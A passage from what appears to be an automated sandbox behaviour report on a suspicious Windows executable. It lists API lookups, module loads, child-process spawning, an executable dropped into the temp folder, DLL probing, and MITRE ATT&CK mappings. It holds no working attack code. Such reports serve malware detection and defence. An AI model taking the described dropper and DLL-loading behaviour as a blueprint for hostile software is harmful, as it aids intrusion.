called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00002956)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"CreateProcessW\" with parameter \":*C:\\3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe *\" - (UID: 00000000-00002920)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZXQZZG\" - (UID: 00000000-00002900)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d00000\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cce0000\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75660000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d00000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"KERNEL32\" at base 75b00000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cce0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75660000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 754f0000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 76230000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 76390000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 757d0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70db0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75920000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 761f0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002920)\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002920)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00002900)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002956)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002956)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76230000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76230000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f\" has an writable section named \".data\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f\" has an writable section named \".bss\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f\" has an writable section named \".idata\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f\" has an writable section named \".CRT\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f\" has an writable section named \".tls\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f ...\" (UID: 00000000-00002900)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZXQZZG\" (UID: 00000000-00002956)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f ...\" (UID: 00000000-00002900)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZXQZZG\" (UID: 00000000-00002956)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f\" was detected as \"MinGW\" and name: \"Compiler\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00002920]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\version.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\FLTLIB.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"085cda53603755dc.exe\" trying to access non-existent file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\Secur32.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" reads file \"c:\\3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"\n \"085cda53603755dc.exe\" reads file \"c:\\users\\%osuser%\\appdata\\local\\temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\version.DLL\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"3233335bf847967e7ff2b37308a90ceb4c4465f19f113dddb17243c91f4d078f.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n 